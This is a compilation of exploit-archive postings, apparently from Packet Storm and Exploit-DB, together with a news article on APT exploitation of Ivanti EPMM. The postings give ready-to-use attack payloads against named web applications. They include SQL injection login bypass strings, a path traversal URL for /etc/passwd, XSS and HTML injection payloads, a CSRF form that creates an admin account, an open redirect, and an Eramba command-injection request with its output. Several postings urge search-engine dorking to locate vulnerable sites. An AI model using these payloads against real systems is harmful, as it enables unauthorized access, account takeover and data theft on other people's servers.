Cryptolive CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Cryptolive cms v1.0 Auth by pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://scriptmafia.org/                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] user & pass : 1'or'1'='1[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Cryptolive CMS 1.0 SQL Injection

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

CREDITS PREVICINI CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CREDITS PREVICINI CMS v1.02 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.previcinidesign.com/                                                                                    |  | # Dork      : inurl:id= Or Web by PREVICINIDESIGN & php?id=                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/amarcordpiadineriait/notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CREDITS PREVICINI CMS 1.02 Cross Site Scripting

Courier Deprixa Pro Integrated Web System version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |    
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : settings/addusersadmin/agregar.php

[+] save code as poc.html .

<div class="modal-content">  
              <div class="modal-header">  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/bluedotcourriercom/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" data-parsley-id="12">  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">  
                  </div>  
                  </div>  
                  <br><br>  
                    <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>  
                         
          </div>  
            
          </div>  
        </div>         
        </div>  
          
      </div>  
      </div>  
            
    </div>  
    </div>  
  </div>  
  

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Courier Deprixa Pro Integrated Web System 3.2.5 Cross Site Request Forgery

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

CVE-2023-33257: Verint Live-chat HTML injection

Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network.
The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian

Vulnerability / Cyber Attack

Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network.

The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear.

"The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said. "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure.'

CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulnerability, CVE-2023-35081, to cause unintended consequences on targeted devices.

Successful exploitation of the twin vulnerabilities makes it possible for adversaries with EPMM administrator privileges to write arbitrary files, such as web shells, with operating system privileges of the EPMM web application server.

The attackers have also been observed tunneling traffic from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet, although it's currently unknown how this was accomplished.

Further analysis has revealed the presence of a WAR file called "mi.war" on Ivanti Sentry, which has been described as a malicious Tomcat application that deletes log entries based on a specific string – "Firefox/107.0" – contained in a text file.

"The APT actors used Linux and Windows user agents with Firefox/107.0 to communicate with EPMM," the agencies said. "Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices."

A majority of the 5,500 EPMM servers on the internet are located in Germany, followed by the U.S., the U.K., France, Switzerland, the Netherlands, Hong Kong, Austria, China, and Sweden, according to Palo Alto Networks Unit 42.

To mitigate against the ongoing threat, it's recommended that organizations apply the latest patches as soon as possible, mandate phishing-resistant multi-factor authentication (MFA) for all staff and services, and validate security controls to test their effectiveness.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Eramba 3.19.1 Remote Command Execution

The Barebones CMS v2.0.2 is vulnerable to Stored Cross-Site Scripting (XSS) when an authenticated user interacts with certain features on the admin panel.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 2023-06-03
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://barebonescms.com/
    # Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
    # Version: v2.0.2
    # Tested : https://demo.barebonescms.com/
    
    
    --- Description ---
    
    1) Login admin panel and go to new story : 
    https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
    2) Click edit button and  write your payload in the title field:
    Payload: "><script>alert(1)</script>
    3) After save change and will you see alert button
    
    
    POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
    Host: demo.barebonescms.com
    Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 237
    Origin: https://demo.barebonescms.com
    Dnt: 1
    Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

CVE-2023-36211: OffSec’s Exploit Database Archive

CoolAdmin version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : CoolAdmin 1.0 Auth By Pass Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://colorlib.com/                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : User & Pass = ADMIN' OR 1=1#[+] Panel : http://wwcddsakoncom/home.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#firefox